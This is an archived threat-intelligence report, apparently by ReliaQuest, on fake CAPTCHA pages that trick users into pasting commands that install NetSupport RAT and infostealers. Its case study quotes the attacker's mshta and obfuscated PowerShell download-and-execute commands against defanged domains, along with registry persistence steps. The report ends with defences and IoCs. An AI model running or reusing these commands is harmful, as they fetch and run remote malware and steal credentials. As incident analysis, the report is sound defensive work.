{ "id": "8cb012e6-60b1-481e-9006-cc82c4ce0c1a", "created_at": "2026-04-06T01:32:02.993581Z", "updated_at": "2026-04-10T03:37:50.802695Z", "deleted_at": null, "sha1_hash": "fca4ed26bcc97d90745302cc55950e9da2810ebb", "title": "Using CAPTCHA for Compromise: Hackers Flip the Script", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 726298, "plain_text": "Using CAPTCHA for Compromise: Hackers Flip the Script\r\nBy Alex Capraro 17 December 2024\r\nPublished: 2024-12-17 · Archived: 2026-04-06 00:09:59 UTC\r\nKey Points\r\nIn our investigations, we identified malware campaigns using fake CAPTCHA pages that mimic trusted\r\nservices like Google and CloudFlare.\r\nThese malicious CAPTCHAs silently copy commands to users’ clipboards, tricking them into execution\r\nvia the Windows Run prompt.\r\nInfections typically involve information stealers (infostealers) and remote-access trojans (RATs) that\r\nextract sensitive data and facilitate persistent access to compromised systems.\r\nAn increasing number of cybercriminals, including advanced threat actors like “APT28” (aka Fancy Bear),\r\nare successfully employing these deceptive tactics. This rapid proliferation underscores the need for timely\r\nand adaptive defensive measures.\r\nOrganizations should educate employees to recognize the risks of fake CAPTCHAs and implement\r\ndetection measures to block associated indicators of compromise (IoCs).\r\nCyber adversaries are constantly inventing new ways to outsmart defenses and exploit unsuspecting users. In early\r\nSeptember 2024, ReliaQuest identified multiple incidents in customer environments involving compromised\r\nwebsites impersonating CAPTCHA pages—those familiar online verification tools that ask you to prove you’re\r\nhuman—to spread malware. These attacks impersonate trusted CAPTCHA services like Google and CloudFlare,\r\nluring users into a false sense of security.\r\nFrom October to early December 2024, our customers observed nearly twice as many fake CAPTCHA websites\r\ncompared to September. This surge was likely the result of researchers releasing the templates used for these\r\ncampaigns, which inadvertently provided more threat actors with the tools to easily replicate these tactics.\r\nThese incidents often culminate in credential theft, giving attackers a crucial foothold for launching data breaches,\r\nhijacking accounts, or committing financial fraud. By exploiting users’ trust in CAPTCHA systems, this effective\r\nand deceptive tactic entices individuals into unknowingly bypassing standard security measures designed to\r\nprevent malicious file downloads.\r\nIn this report, we take you through the progression of a typical incident involving a fake CAPTCHA and detail the\r\ninformation-stealing malware (infostealers) and remote-access trojans (RATs) these campaigns distribute. To help\r\nyou strengthen your defensive measures and reduce the impact of similar attacks, we also examine a real-world\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 1 of 11\n\ncase study, how the fake CAPTCHA method might evolve, and how ReliaQuest’s automated response tools\r\nminimize its consequences.\r\nCAPTCHA Trickery: How Do Incidents Usually Play Out?\r\nThe attack chain is deceptively simple. It uses familiar CAPTCHA interfaces to execute scripts, which makes it\r\nhighly effective because of its seemingly benign nature. The incidents we investigated typically followed the\r\nsequence below:\r\n1. Malicious Redirect: A web user visits a compromised website and is redirected to another webpage, where\r\nthey’re presented with a familiar and seemingly harmless CAPTCHA challenge (see Figure 1).\r\n2. JavaScript Clipboard Hijack: Simply by visiting the website, a malicious command is silently copied to the\r\nuser’s clipboard via JavaScript, without their knowledge.\r\n3. Unusual Run Prompt: Instead of clicking how many traffic lights or bridges they see, the user is instructed to\r\nopen a Run prompt—a Windows feature for quickly executing commands, opening programs, and accessing files\r\n—and paste the pre-copied command, unknowingly running the malicious script.\r\n4. Malware Installation: The command leads to the installation of malware, often resulting in credential theft, as\r\nlogin details for systems, applications, and services are harvested and sent to attackers.\r\nFigure 1: Example of a fake CAPTCHA with the payload in the Run box\r\nImpersonating CloudFlare: A Step-by-Step Look at the Attack\r\nThe approach taken by the threat actor in this case study is particularly innovative. The actor leveraged a\r\nmalicious website that impersonated CloudFlare, a widely used distributed denial of service (DDoS) protection\r\nplatform, to enhance the attack’s credibility.\r\nInitial Infection\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 2 of 11\n\nIn October 2024, a retail trade customer encountered a fake CAPTCHA (see Figure 2) hosted at\r\ninspyrehomedesign[.]com after being redirected from retailtouchpoints[.]com.\r\nFigure 2: Fake Cloudflare CAPTCHA with the alerting command highlighted\r\nTypical of deceptive CAPTCHAs, it instructed the user to perform a copy-and-paste action in the Windows Run\r\nfeature. Completing this fake CAPTCHA resulted in the execution of the following command:\r\n\"C:\\WINDOWS\\system32\\mshta.exe\" hxxps://inspyrehomedesign[.]com/Ray-verify.html # ✅ ''Verify you\r\nare human - Ray Verification ID: 6450''\r\nIn this command, the “Verify you are human” text comes after the malicious command, cleverly concealing the\r\nharmful instructions once pasted into the Windows Run box (see Figure 2).\r\nThe command uses the MSHTA.exe binary to download the file “Ray-verify[.]html.” Notably, the use of the\r\nMSHTA.exe Windows utility allows for the discreet download of the next stage of the infection*.* The HTML\r\ndocument contains PowerShell commands that execute the subsequent payload(s).\r\nSecondary Script Execution\r\nThe second stage of the attack began with the execution of a PowerShell script, which concealed an additional\r\nPowerShell script within a file named “o.png.” This obfuscation was designed to evade detection. The script was\r\ndownloaded from the domain “traversecityspringbreak[.]com” using the command:\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 3 of 11\n\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $c1='(New-ObjectNet.We';$c4='bClient).Downlo';\r\n$c3='adString(''hxxps://traversecityspringbreak[.]com/o/o.png'')'; $TC=I E X ($c1,$c4,$c3 -Join '')\r\nI E X\r\nThis subsequent command embedded within the “o.png” script then cleared the DNS cache via the command\r\nbelow, likely to hide any evidence of the actor’s malicious activity.\r\nipconfig /flushdns\r\nTo create a concealed directory, a random directory name was generated and created in the user’s AppData folder\r\nusing the command:\r\n$randomFolderName = -join\r\n((65..90) + (97..122)\r\nGet-Random -\r\nCount 6\r\n% {[char]$_}) New-Item -ItemType Directory -\r\nPath $randomFolderPath\r\nThis led to the following path being created:\r\nC:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID\r\nDownloading and Hiding Malicious Components\r\nNext, 12 more files were downloaded from traversecityspringbreak[.]com using the command:\r\nInvoke-WebRequest hxxps://traversecityspringbreak[.]com/o/[n].png -OutFile\r\nC:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID[filename]\r\nThe files included “client32.ini” (a configuration file) and “client32.exe” (the main file for NetSupport RAT). The\r\nthreat actor hid the directory to conceal the installation of these 12 files from the user via the command:\r\ncmd /c attrib +h C:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID\r\nEstablishing Persistence and Running the RAT\r\nA “Run Key” was added to the registry using the following command to ensure the RAT is executed at every\r\nstartup:\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 4 of 11\n\nNew-ItemProperty -Path HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name Microsoft -\r\nValue C:\\Users\\CURRENTUSER\\AppData\\Roaming\\geWGID\\client32.exe\r\nFinally, the adversary launched the RAT using the command:\r\nStart-Process C:\\CURRENTUSER\\admin\\AppData\\Roaming\\geWGID\\client32.exe\r\nHow did ReliaQuest Respond?\r\nA ReliaQuest GreyMatter alert fired because of suspicious PowerShell execution in the initial command line of\r\nthis attack.\r\nOur investigation into the suspicious activity revealed that the indicators of compromise (IoCs), including\r\nclient32.exe and client32.ini, were consistent with the installation of NetSupport RAT—a malicious remote-access\r\ntool known for targeting various sectors to facilitate data theft, espionage, and network control.\r\nReliaQuest isolated the affected host using GreyMatter Response Playbooks, revoked the user’s session, reset their\r\npassword, and blocked the identified IoCs using GreyMatter Respond.\r\nThe key takeaway from this case study is the urgent need to educate employees about new and evolving\r\nmanipulation techniques. This knowledge will empower them to recognize suspicious activities, such as websites\r\nthat prompt users to run commands. Additionally, companies should implement network controls to block access\r\nto newly registered and compromised websites, further fortifying defenses against such threats.\r\nTo prevent similar incidents, targeted user training is crucial. Focus on helping your teams recognize the signs of\r\nmalicious activity, such as unexpected requests to run commands or download (potentially malicious) updates\r\nfrom unverified sources. Encourage them to be vigilant in verifying URL authenticity to thwart infection attempts.\r\nTraining should also cover identifying unusual behavior in familiar interfaces, like CAPTCHAs asking for non-standard actions. By providing clear examples, employees will be able to effectively spot these threats early.\r\nAdditionally, emphasize the importance of immediately reporting suspicious activities to enable rapid responses\r\nand mitigation actions, such as blocking malicious domains.\r\nActive since at least 2017, “NetSupport RAT” uses the NetSupport Manager tool, which is known for\r\nsurveillance capabilities like keystroke logging, screen capturing, and webcam access.\r\nNetSupport RAT spreads primarily through phishing, drive-by downloads, and exploiting vulnerabilities like\r\nCVE-2023-36025—a Windows SmartScreen bypass vulnerability.\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 5 of 11\n\nA NetSupport RAT infection can lead to catastrophic breaches, giving attackers control over your system,\r\nenabling extensive data theft, unauthorized surveillance, and potentially facilitating lateral movement and\r\ndisruption in your network.\r\nShifting Threat Landscape in CAPTCHA Exploitation\r\nInnovative Strategies in User Manipulation\r\nThis is not the first time we’ve seen threat actors using individuals’ clipboards to trick them into executing\r\nmalicious commands. In May 2024, we found that the JavaScript framework “ClearFake” had been using a similar\r\ncampaign to drop infostealers.\r\nInstead of a CAPTCHA, compromised websites displayed a prompt indicating content could not be shown\r\nproperly (see Figure 3) and instructed users to install a root certificate by clicking a “Fix it” button.\r\nFigure 3: Example of a “ClickFix/ClearFake” campaign pop-up message\r\nThis action copied obfuscated malicious PowerShell code to the users’ clipboards. Users were then guided to open\r\na PowerShell terminal and paste in the code, which was then executed.\r\nThe ClearFake campaign is a less polished precursor to the new fake CAPTCHA tactics.\r\nThe root certificate approach relies heavily on user compliance, requiring steps like manually copying commands\r\nto the user’s clipboard and opening a PowerShell terminal—actions likely to raise suspicion among more cautious\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 6 of 11\n\nusers.\r\nIn contrast, the new fake CAPTCHA method simplifies the process by presenting a familiar and trusted\r\nCAPTCHA interface with fewer steps to follow, which reduces user hesitation.\r\nThis effective, streamlined method has, in turn, led to various modifications and improvements, including:\r\nNew Fake CAPTCHA Templates: Innovative templates mimicking CloudFlare and Google Meet pages\r\nhave been created. By continually developing new landing pages to deliver the fake CAPTCHAs, attackers\r\ncan target a broader range of potential victims.\r\nBypassing User Verification: The method now skips the “verify” click step to access instructions,\r\nencouraging users to complete the copy-paste instructions more mindlessly, reducing their chance to\r\nscrutinize the actions.\r\nClipboard Clearing: After executing the payload command, the clipboard is cleared to hide the malicious\r\nactivity, making detection more difficult.\r\nThe clear evolution of user manipulation tactics highlights how quickly threat actors can make improvements to\r\nexisting campaigns for greater impact. These advancements demonstrate not only the adaptability of\r\ncybercriminals but also the growing sophistication of their methods. As threat actors refine their techniques, they\r\ncan exploit user trust more effectively, bypass security measures with greater ease, and widen their reach to target\r\nmore individuals.\r\nCAPTCHA Me If You Can: Top Threats\r\nWe looked into customer incidents involving the new fake CAPTCHA campaign to find the most prevalent\r\nmalware families found in these infections between October and early December 2024:\r\n1. “Lumma Stealer” (aka LummaC2, Lumma)\r\n2. “StealC”\r\n3. NetSupport RAT (aka Netsupport)\r\n4. Amadey”\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 7 of 11\n\nFigure 4: BreachForums user recommending Lumma Stealer\r\nRATs like NetSupport grant attackers persistent access to compromised systems, enabling continuous surveillance,\r\ndata theft, and lateral movement within networks. This means attackers can monitor activities, intercept sensitive\r\ncommunications, and potentially access other connected systems, amplifying the impact of a breach.\r\nInfostealers from campaigns like Lumma and StealC can exfiltrate sensitive data, including login credentials,\r\nfinancial information, and personally identifiable information (PII). This stolen data is often sold on underground\r\nmarkets, leading to identity theft, financial fraud, and initial acess into enterprise networks. The financial and\r\nreputational damage from such compromises can be significant, affecting customer trust and resulting in\r\nregulatory penalties.\r\nThreat actors on cybercriminal forums frequently seek recommendations for the most effective tools. The\r\nwidespread adoption of Lumma Stealer is likely influenced by endorsements from high-reputation forum users\r\nwho have found the tool effective and advocate its use to others. As shown in the screenshot (see Figure 4), a\r\nprominent BreachForums user specifically recommends Lumma Stealer to another forum user.\r\nHigh-Level Hackers Turn to Basic CAPTCHA Tactics\r\nBoth regular cybercriminals and sophisticated groups like APT28, linked to the Russian military, are trying their\r\nhand at these tactics. A recent investigation by the Computer Emergency Response Team of Ukraine (CERT-UA)\r\nrevealed APT28 had been using fake CAPTCHA systems to infiltrate local governments. By mimicking\r\nreCAPTCHA interfaces, they tricked users into executing commands that downloaded harmful scripts. These\r\nscripts are capable of establishing Secure Shell (SSH) tunnels and exfiltrating data, highlighting the attack’s\r\nsimplicity and potency.\r\nThis is significant because, traditionally, effective hacking methods are first developed by skilled groups and\r\neventually trickle down to less experienced hackers. However, in this case, even advanced groups are adopting\r\ntactics typically used by common cybercriminals, underscoring the surprising effectiveness of these fake\r\nCAPTCHA strategies.\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 8 of 11\n\nWhat ReliaQuest is Doing\r\nReliaQuest is actively monitoring these evolving campaigns, with a keen focus on shifts in delivery mechanisms.\r\nAlthough fake CAPTCHAs are a new technique, the underlying method relies on encoded PowerShell commands\r\nor Living off the Land binaries (LOLBins) like MSHTA.exe. As such, we can detect this activity using pre-established detection rules to identify common malware delivery techniques.\r\nGreyMatter Respond and Automated Response Playbooks\r\nFor the fastest remediation against threats like NetSupport RAT, organizations should implement automated\r\nresponse actions. Enabling GreyMatter’s Automated Response Playbooks allows for automatic threat containment,\r\nreducing the mean time to contain a threat, or MTTC, and halting the adversary’s progress. Alternatively,\r\norganizations can opt for the “RQ Approved” setting to allow our analyst team to handle remediation actions. This\r\napproach speeds up containment while requiring a ReliaQuest analyst’s discretion when executing a Response\r\nPlaybook.\r\nTo most effectively contain and mitigate threats from NetSupport RAT, enabling and automating the Isolate Host\r\nresponse playbook is crucial—after ensuring that legitimate user activities and critical business processes won’t be\r\ndisrupted. This action severs all connections to the attacker’s command-and-control (C2) infrastructure,\r\npreventing further execution of malicious commands or downloads.\r\nIf isolating the host isn’t feasible, for instance when dealing with critical business assets, we recommend manually\r\nexecuting the Block IP, Block Domain, and Block URL playbooks on identified attacker infrastructure. These\r\nactions prevent hosts from downloading additional malware and stop them from reconnecting to the C2\r\ninfrastructure.\r\nGiven that most malware, including infostealers, targets sensitive information, it’s always best to err on the side of\r\ncaution and assume that a user’s credentials may be compromised. Activating the Terminate Active Sessions and\r\nReset Password playbooks ensures that any hijacked sessions are ended and compromised credentials are\r\nchanged, thereby preventing further unauthorized access.\r\nAdditionally, running the Delete File and Block Hash playbooks removes identified malicious files and blocks\r\ntheir execution on other hosts. This limits the threat actor’s ability to move laterally and prevents additional\r\ncompromises.\r\nOrganizations using ReliaQuest’s Automated Response Playbooks have reduced their MTTC to an average of just\r\nfive minutes for relevant alerts, compared to five hours or longer when relying on manual response strategies.\r\nThese playbooks are proven to effectively mitigate threats and minimize operational disruptions, allowing\r\norganizations to contain threats quickly and maintain operational continuity.\r\nFortify Your Security Posture By:\r\nConducting Employee Training and Awareness: Conduct regular training sessions to educate employees\r\nabout the risks associated with fake CAPTCHAs. Though this may sound generic, an informed workforce\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 9 of 11\n\nis a critical defense against social engineering attacks. Training should cover how to spot suspicious\r\nCAPTCHAs, such as recognizing when websites are instructing users to run commands.\r\nDisabling Password Saving in Browsers: Implement strict network policies or Group Policy Objects\r\n(GPOs) to prevent web browsers from saving passwords. This critical security measure helps protect\r\nagainst infostealers that target stored credentials to exfiltrate sensitive information. Conduct regular audits\r\nto ensure compliance and effectiveness. Alternatively, consider deploying an organization-wide password\r\nmanager, offering users convenience while enhancing security.\r\nDeploying Constrained Language Mode: This mode restricts PowerShell’s scripting environment to a\r\nsafer subset of its functionality, limiting access to potentially dangerous operations. It prevents the use of\r\ncertain language elements and object types that attackers could exploit. By doing so, Constrained Language\r\nMode reduces the attack surface, making it harder for malicious scripts to execute harmful actions, evade\r\ndetection, or escalate privileges.\r\nConclusion\r\nIn this report, we’ve highlighted the urgent need for robust cybersecurity measures in the face of evolving\r\nCAPTCHA techniques used by both everyday cybercriminals and advanced groups like APT28. Automated\r\nincident response measures not only accelerate remediation efforts but also allow for analyst oversight when\r\nneeded. By implementing GreyMatter Automated Response Playbooks, organizations can swiftly and effectively\r\ncontain these threats, significantly reducing MTTC and ensuring operational continuity.\r\nLooking ahead, we predict with high confidence that threat actors will continue to innovate and refine their\r\nCAPTCHA-targeting campaigns, making them even more elusive. Within the next three months, we anticipate\r\nenhancements in the fake CAPTCHA infection vector, such as employing alternative execution methods that do\r\nnot use PowerShell commands. This could involve using other LOLBins like forfiles.exe or certutil.exe to\r\ndownload the initial stage, aiming to circumvent existing detection measures.\r\nThis evolution presents a significant risk and highlights the importance of a defense-in-depth strategy that layers\r\nmultiple security measures to effectively counter these advancing threats. By adopting this approach, you can\r\nharden your defenses, mitigate similar threats, and maintain a resilient security posture.\r\nIoCs\r\nWe have incorporated these IoCs into our GreyMatter Intel feed for ReliaQuest customers. Our investigations\r\nfound that these domains hosted fake CAPTCHA infrastructure in various incidents.\r\nholidaybunch[.]com\r\nforthedoglover[.]com\r\ntraversecityspringbreak[.]com\r\ninspyrehomedesign[.]com\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 10 of 11\n\nretailtouchpoints[.]com\r\nwebdemo[.]biz\r\nthecopycat[.]biz\r\nSource: https://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nhttps://www.reliaquest.com/blog/using-captcha-for-compromise/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.reliaquest.com/blog/using-captcha-for-compromise/" ], "report_names": [ "using-captcha-for-compromise" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439122, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fca4ed26bcc97d90745302cc55950e9da2810ebb.pdf", "text": "https://archive.orkl.eu/fca4ed26bcc97d90745302cc55950e9da2810ebb.txt", "img": "https://archive.orkl.eu/fca4ed26bcc97d90745302cc55950e9da2810ebb.jpg" } }